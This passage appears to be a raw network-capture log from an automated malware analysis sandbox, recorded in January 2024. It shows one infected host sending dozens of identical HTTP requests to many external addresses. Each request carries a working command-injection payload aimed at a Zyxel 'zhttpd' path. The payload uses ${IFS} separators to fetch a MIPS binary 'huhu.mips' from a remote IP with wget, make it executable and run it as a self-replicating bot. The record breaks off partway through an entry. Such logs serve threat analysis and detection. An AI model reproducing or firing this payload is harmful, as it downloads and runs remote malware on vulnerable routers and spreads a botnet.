                                      Jan 19, 2024 17:29:53.185353994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9506192.168.2.1444742206.93.12.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.185421944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9507192.168.2.145666232.69.166.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.185425997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9508192.168.2.1433868161.194.135.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.185467005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9509192.168.2.1455440143.253.85.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.185497999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9510192.168.2.144900268.31.100.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.185551882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9511192.168.2.1459698221.189.218.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.185605049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9512192.168.2.144506286.74.239.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.185627937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9513192.168.2.145058224.229.102.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.185687065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9514192.168.2.144691497.92.140.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.185728073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9515192.168.2.1445884146.197.11.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.185730934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9516192.168.2.14554305.203.58.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.185787916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9517192.168.2.144454257.88.126.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.185839891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9518192.168.2.143892837.230.153.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.185880899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9519192.168.2.1453934210.188.70.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.185914040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9520192.168.2.1458160221.123.243.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.185954094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9521192.168.2.1438998187.104.44.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.185992002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9522192.168.2.1457244182.159.51.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.186007977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9523192.168.2.1439738217.148.108.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.186038971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9524192.168.2.1454424222.56.124.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.186058998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9525192.168.2.1446676153.65.74.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.186098099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9526192.168.2.1448772144.143.0.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.186120987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9527192.168.2.1444506189.212.92.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.186183929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9528192.168.2.144860849.248.182.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.186233997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9529192.168.2.1442798195.80.59.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.186278105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9530192.168.2.1433850187.159.78.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.186331034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9531192.168.2.1444480167.25.219.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.186368942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9532192.168.2.1446902109.205.159.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.186419010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9533192.168.2.143781893.169.182.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.186467886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9534192.168.2.1447970109.67.199.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.186506033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9535192.168.2.143435277.122.188.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.186561108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9536192.168.2.1458458223.126.56.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.186585903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9537192.168.2.144670823.11.189.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.186630011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9538192.168.2.145767291.125.127.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.186659098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9539192.168.2.1449946174.72.150.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.186697960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9540192.168.2.1451824167.234.207.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.186757088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9541192.168.2.1437874144.122.240.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.186795950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9542192.168.2.144903636.65.113.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.186861992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9543192.168.2.143798280.6.217.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.186877966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9544192.168.2.1445328154.129.168.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.186918020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9545192.168.2.1454926128.183.124.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.186959982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9546192.168.2.1448606117.103.141.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.187000036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9547192.168.2.145663051.148.164.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.187027931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9548192.168.2.1457766142.134.219.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.187058926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9549192.168.2.1452978203.118.211.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.187082052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9550192.168.2.1454350147.150.178.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.187098026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9551192.168.2.1446944150.13.218.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.187144995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9552192.168.2.1433766179.17.120.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.187196016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9553192.168.2.1449280125.101.10.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.187235117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9554192.168.2.1449460142.60.206.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.187279940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9555192.168.2.145299471.40.139.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.187279940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9556192.168.2.143805239.181.8.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.187304020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9557192.168.2.1454438187.14.111.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.187316895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9558192.168.2.1454450119.94.246.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.187370062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9559192.168.2.1440800140.208.208.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.187397957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9560192.168.2.143345878.25.118.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.187450886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9561192.168.2.1434296105.254.244.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.187500000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9562192.168.2.1456508195.51.17.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.187527895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9563192.168.2.1436862142.76.128.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.187556028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9564192.168.2.1447518216.251.144.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.187601089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9565192.168.2.1457660121.10.72.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.187652111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9566192.168.2.145150854.56.118.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.187670946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9567192.168.2.1453656162.202.171.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.187728882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9568192.168.2.1456080100.196.245.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.187755108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9569192.168.2.1436802219.75.90.253443
                                      TimestampBytes transferredDirectionData
